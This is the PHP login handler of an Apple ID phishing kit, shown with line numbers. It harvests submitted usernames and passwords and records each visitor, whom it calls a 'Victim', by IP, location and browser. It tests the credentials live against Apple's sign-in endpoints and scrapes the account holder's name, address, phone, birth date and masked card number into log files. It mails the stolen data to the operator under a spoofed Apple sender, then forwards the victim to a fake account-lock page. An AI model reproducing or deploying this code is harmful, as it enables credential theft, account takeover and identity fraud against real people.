<?phpset_time_limit(0);error_reporting(0);require "session_protect.php";

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. require "session_protect.php";
5. require "detect_country.php";
6. require "antibotlogin.php";
7. require "functions.php";
8. require "../../CONTROLS.php";
9. $_SESSION['user'] = $_POST['user'];
10. $_SESSION['pass'] = $_POST['pass'];
11. $ip = $_SERVER['REMOTE_ADDR'];
12. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
13. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
14. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
15. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
16. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
17. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
18. $from = $From_Address;
19. $headers = "From: Apple Account <".$from.">";
20. $subj = "Apple [ ".$nama_negara." - ".$ip." ]";
21. $to = $Your_Email;
22. $data = "
23. [+]=================MyYosi=================[+]
24. [+]Username : ".$_SESSION['user']."
25. [+]Password : ".$_SESSION['pass']."
26. [+]========================================[+]
27. [+]$VictimInfo1
28. [+]$VictimInfo2
29. [+]$VictimInfo3
30. [+]$VictimInfo4
31. [+]$VictimInfo5
32. [+]==================Thnx==================[+]
33. ";
34. function curl($url, $post = null, $usecookie = null, $sock = null, $timeout = null) {
35. $ch = curl_init();
36. if($post != null) {
37. curl_setopt($ch, CURLOPT_POST, 1);
38. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
39. }
40. if($timeout != null){
41. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, $timeout);
42. }
43. if($sock != null){
44. curl_setopt($ch, CURLOPT_PROXY, $sock);
45. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
46. }
47. curl_setopt($ch, CURLOPT_URL, $url);
48. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
49. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53");
50. if ($usecookie != null) {
51. curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
52. curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
53. }
54. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
55. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
56. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
57. $result=curl_exec ($ch);
58. curl_close ($ch);
59. return $result;
60. }
61. function getStr($string,$start,$end){
62. $str = explode($start,$string);
63. $str = explode($end,$str[1]);
64. return $str[0];
65. }
66. function AppleValid($email) {
67. $cookies = "cookies/".md5($_SERVER['REMOTE_ADDR']).'.txt';
68. $url = "https://ams.apple.com/pages/SignUp.jsf";
69. $data = "SignUpForm=SignUpForm&SignUpForm%3AemailField=".$email."&SignUpForm%3AblueCenter=Continue&javax.faces.ViewState=j_id1";
70. $page = curl($url,"",$cookies);
71. if($page) {
72. $curl = curl($url,$data,$cookies);
73. if(preg_match('/This email address is already in use for another Apple ID account/i',$curl)) {
74. $result = "Valid";
75. } else {
76. $result = "Invalid";
77. }
78. } else {
79. $result = "UnKnown";
80. }
81. @unlink($cookies);
82. return $result;
83. }
84. function GetAddress($email, $cookies) {
85. $link = "https://appleid.apple.com/account/manage";
86. $result = curl($link,"",$cookies);
87. preg_match('/("fullName":")(.*) /',$result, $app_name);$ex1 = explode('","', $app_name[2]);
88. $apple['fullname'] = preg_replace('/\s+/', ' ', strip_tags($ex1[0]));
89. $_SESSION['fullname'] = $apple['fullname'];
90. $delcar[1] = str_replace("••••", "", $apple['fullname']);
91. $delcar[2] = str_replace("\u2022", "", $delcar[1]);
92. $clearspace = str_replace(" ", " ", $delcar[2]);
93. $plode = explode(" ",$clearspace);
94. if(empty($plode[2])){
95. $apple['firstname'] = $plode[0];
96. $_SESSION['firstname'] = $apple['firstname'];
97. $apple['midlename'] = "";
98. $_SESSION['midlename'] = $apple['midlename'];
99. $apple['lastname'] = $plode[1];
100. $_SESSION['lastname'] = $apple['lastname'];
101. } else {
102. $apple['firstname'] = $plode[0];
103. $_SESSION['firstname'] = $apple['firstname'];
104. $apple['midlename'] = $plode[1];
105. $_SESSION['midlename'] = $apple['midlename'];
106. $apple['lastname'] = $plode[2];
107. $_SESSION['lastname'] = $apple['lastname'];
108. }
109. preg_match('/("line1":")(.*)/',$result, $app_address);$ex2 = explode('","', $app_address[2]);
110. $apple['address'] = preg_replace('/\s+/', ' ', strip_tags($ex2[0]));
111. $_SESSION['address'] = $apple['address'];
112. preg_match('/(city":")(.*)/',$result, $app_city);$ex3 = explode('","', $app_city[2]);
113. $apple['city'] = preg_replace('/\s+/', ' ', strip_tags($ex3[0]));
114. $_SESSION['city'] = $apple['city'];
115. preg_match('/(postalCode":")(.*)/',$result, $app_zip);$ex5 = explode('","', $app_zip[2]);
116. $apple['zip'] = preg_replace('/\s+/', ' ', strip_tags($ex5[0]));
117. $_SESSION['zip'] = $apple['zip'];
118. preg_match('/(stateProvinceName":")(.*)/',$result, $app_state);$ex4 = explode('","', $app_state[2]);
119. $apple['state'] = preg_replace('/\s+/', ' ', strip_tags($ex4[0]));
120. if(!empty($apple['state'])){
121. $_SESSION['state'] = $apple['state'];
122. } else {
123. $_SESSION['state'] = "-";
124. }
125. preg_match('/(fullNumberWithCountryPrefix":")(.*)/',$result, $app_phone);$ex6 = explode('","', $app_phone[2]);
126. $X_app_phone[0] = preg_replace('/\s+/', ' ', strip_tags($ex6[0]));
127. $X_app_phone[1] = str_replace(" ", "", $X_app_phone[0]);
128. $X_app_phone[2] = str_replace(chr(194).chr(160), "", $X_app_phone[1]);
129. $X_app_phone[3] = str_replace("+", "", $X_app_phone[2]);
130. $X_app_phone[4] = str_replace("-", "", $X_app_phone[3]);
131. $X_app_phone[5] = str_replace("(", "", $X_app_phone[4]);
132. $X_app_phone[6] = str_replace(")", "", $X_app_phone[5]);
133. $apple['phone'] = trim($X_app_phone[6]);
134. $_SESSION['phone'] = $apple['phone'];
135. preg_match('/(obfuscatedNumber":")(.*)/',$result, $app_carta);$ex7 = explode('","', $app_carta[2]);
136. $apple['carta'] = preg_replace('/\s+/', ' ', strip_tags($ex7[0]));
137. $_SESSION['carta'] = $apple['carta'];
138. preg_match('/(birthday":")(.*)/',$result, $app_bith);$ex8 = explode('","', $app_bith[2]);
139. $dob = preg_replace('/\s+/', ' ', strip_tags($ex8[0]));
140. $pecah = explode("-",$dob);
141. $apple['dob'] = $pecah[1]."/".$pecah[2]."/".$pecah[0];
142. $_SESSION['dob'] = $apple['dob'];
143. $json = json_encode($apple);
144. $file = fopen("../logs/address/".$email.".dat", "w");
145. fwrite($file, $json."\n");
146. return $json;
147. }
148. function AppleChk($email, $password){
149. $cookies = md5($_SERVER['REMOTE_ADDR']).'.txt';
150. $url = "https://idmsa.apple.com/IDMSWebAuth/authenticate";
151. $page = curl($url,'',$cookies);
152. $data = 'appleId='.$email.'&accountPassword='.$password.'&appIdKey=af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3&accNameLocked=false&language=US-EN&path=/signin/?referrer=/account/manage&Env=PROD';
153. $curl = curl($url,$data,$cookies);
154. if(stripos($curl, 'Location') !== false) {
155. $result['error'] = 0;
156. $result['details'] = GetAddress($email, $cookies);
157. $result['status'] = "Live";
158. @unlink($cookies);
159. } else {
160. $result['error'] = 2;
161. $result['status'] = "Dead";
162. @unlink($cookies);
163. }
164.  
165. return json_encode($result);
166. }
167. if($True_Login == 1) {
168. $applechk = AppleValid($_POST['user']);
169. if ($applechk == 'Invalid') {
170. echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
171. exit();
172. } elseif($applechk == 'UnKnown') {
173. echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
174. exit();
175. } elseif($applechk == 'Valid') {
176. if($Encrypt==1){
177. include("AES.php");
178. $imputText = $data;
179. $imputKey = $Key;
180. $blockSize = 256;
181. $aes = new AES($imputText, $imputKey, $blockSize);
182. $enc = $aes->encrypt();
183. $aes->setData($enc);
184. $dec=$aes->decrypt();
185. }
186. if($Save_Log==1) {
187. if($Encrypt==1) {
188. $file=fopen("../logs/".$Login_Log,"a");
189. fwrite($file,$enc);
190. fclose($file);
191. }
192. else {
193. $file=fopen("../logs/".$Login_Log,"a");
194. fwrite($file,$data);
195. fclose($file);
196. }
197. }
198. if($Send_Log==1) {
199. if($Encrypt==1) {
200. mail($to,$subj,$enc,$headers);
201. } else {
202. mail($to,$subj,$data,$headers);
203. }
204. } ?>
205. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
206. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
207. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
208. </form>
209. <script language="JavaScript">
210. document.frm.submit();
211. </script>
212. <?php exit();
213. }
214. } elseif($True_Login == 2) {
215. $check = AppleChk($_POST['user'], $_POST['pass']);
216. $json = json_decode($check);
217. if($json->status == "Dead"){
218. echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
219. exit();
220. } elseif($json->status == "Live"){
221. if($Encrypt==1){
222. include("AES.php");
223. $imputText = $data;
224. $imputKey = $Key;
225. $blockSize = 256;
226. $aes = new AES($imputText, $imputKey, $blockSize);
227. $enc = $aes->encrypt();
228. $aes->setData($enc);
229. $dec=$aes->decrypt();
230. }
231. if($Save_Log==1) {
232. if($Encrypt==1) {
233. $file=fopen("../logs/".$Login_Log,"a");
234. fwrite($file,$enc);
235. fclose($file);
236. }
237. else {
238. $file=fopen("../logs/".$Login_Log,"a");
239. fwrite($file,$data);
240. fclose($file);
241. }
242. }
243. if($Send_Log==1) {
244. if($Encrypt==1) {
245. mail($to,$subj,$enc,$headers);
246. } else {
247. mail($to,$subj,$data,$headers);
248. }
249. }
250. ?>
251. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
252. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
253. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
254. </form>
255. <script language="JavaScript">
256. document.frm.submit();
257. </script>
258. <?php } else {
259. echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
260. exit();
261. }
262. } else {
263. if($Encrypt==1){
264. include("AES.php");
265. $imputText = $data;
266. $imputKey = $Key;
267. $blockSize = 256;
268. $aes = new AES($imputText, $imputKey, $blockSize);
269. $enc = $aes->encrypt();
270. $aes->setData($enc);
271. $dec=$aes->decrypt();
272. }
273. if($Save_Log==1) {
274. if($Encrypt==1) {
275. $file=fopen("../logs/".$Login_Log,"a");
276. fwrite($file,$enc);
277. fclose($file);
278. }
279. else {
280. $file=fopen("../logs/".$Login_Log,"a");
281. fwrite($file,$data);
282. fclose($file);
283. }
284. }
285. if($Send_Log==1) {
286. if($Encrypt==1) {
287. mail($to,$subj,$enc,$headers);
288. } else {
289. mail($to,$subj,$data,$headers);
290. }
291. } ?>
292. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
293. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
294. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
295. </form>
296. <script language="JavaScript">
297. document.frm.submit();
298. </script>
299. <?php } ?>